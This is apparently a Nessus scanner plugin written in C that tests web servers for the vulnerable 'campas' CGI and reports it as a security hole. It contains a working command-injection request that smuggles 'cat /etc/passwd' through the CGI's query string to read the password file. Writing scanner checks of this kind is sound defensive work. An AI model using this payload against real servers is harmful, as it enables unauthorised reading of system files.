
#include <config.h>
#include <nessus-devel.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <nessuslib.h>
#include <sys/socket.h>  
#define NAME "campas-cgi tester"
#define DESC "This plugin determines whether the 'campas' cgi is intalled \
This cgi allows a remote user to view any file on a given host"
#define COPYRIGHT "ported by Renaud Deraison"
#define SUMM "determines the presence of the 'campas' cgi"


int plugin_init(struct arglist *desc);
int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "CGI abuses");
	return(0);
}



int plugin_run(struct arglist * args);	
int plugin_run(struct arglist * args)
{
	
	
	if(host_get_port_state(args, 80)<=0)return(0);
	
	if(is_cgi_installed(args, "campas"))
	{
	char * buffer = emalloc(4096);
	char * result;
	int soc = open_sock_tcp(args, 80);
	
	if(soc<=0)
	 /* Couldn't re-open the connection... Strange !*/
	 post_hole(args, 80, "The 'campas' cgi is present\nRemote files may be viewed");
	else {
	  	sprintf(buffer, "GET /cgi-bin/campas?%%0Acat%%20/etc/passwd%%0A\n");
		send(soc, buffer, strlen(buffer), 0);
		bzero(buffer, 4096);
		read(soc, buffer, 4096);
		result = emalloc(strlen(buffer) + 100);
		sprintf(result, "The 'campas' cgi is present
We attempt to obtain /etc/passwd :\n%s\nSolution : upgrade this cgi or delete it", buffer);
		efree(buffer);
		post_hole(args, 80, result);
		efree(result);
		close(soc);
		}
	}
	return(0);
}



